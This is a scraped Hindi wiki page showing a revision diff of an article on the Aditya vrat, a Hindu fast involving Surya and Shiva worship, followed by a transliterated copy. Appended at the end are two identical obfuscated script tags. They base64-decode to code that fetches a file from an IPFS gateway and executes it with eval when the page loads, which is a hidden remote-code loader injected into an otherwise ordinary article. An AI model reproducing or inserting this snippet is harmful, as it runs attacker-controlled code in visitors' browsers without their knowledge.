Difference between revisions of "आदित्य व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[आश्विन]] में [[रविवार]] को प्रारम्भ होता है। इसे एक वर्ष तक करना चाहिए।
 
*यह व्रत [[आश्विन]] में [[रविवार]] को प्रारम्भ होता है। इसे एक वर्ष तक करना चाहिए।
 
*इस व्रत में [[सूर्य देवता]] की पूजा करनी चाहिए।  
 
*इस व्रत में [[सूर्य देवता]] की पूजा करनी चाहिए।  
Line 7: Line 7:
 
*यह व्रत केवल स्त्रियों के द्वारा किया जाता है।
 
*यह व्रत केवल स्त्रियों के द्वारा किया जाता है।
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 08:19, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat ashvin mean ravivar ko prarambh hota hai. ise ek varsh tak karana chahie.
  • is vrat mean soory devata ki pooja karani chahie.
  • vratark mean aya hai ki samb ko kis prakar krishna ne shap diya ki use kushth ho gaya aur is vrat ke karane se vah kis prakar rogamukt ho gaya.
  • yah vrat magha nakshatr nakshatr mean ravivar ki ashtami evan chaturdashi ke din karana chahie.
  • is vrat mean shiv ki pooja karani chahie, aur til khana chahie.[1]
  • yah vrat keval striyoan ke dvara kiya jata hai.


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 589).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>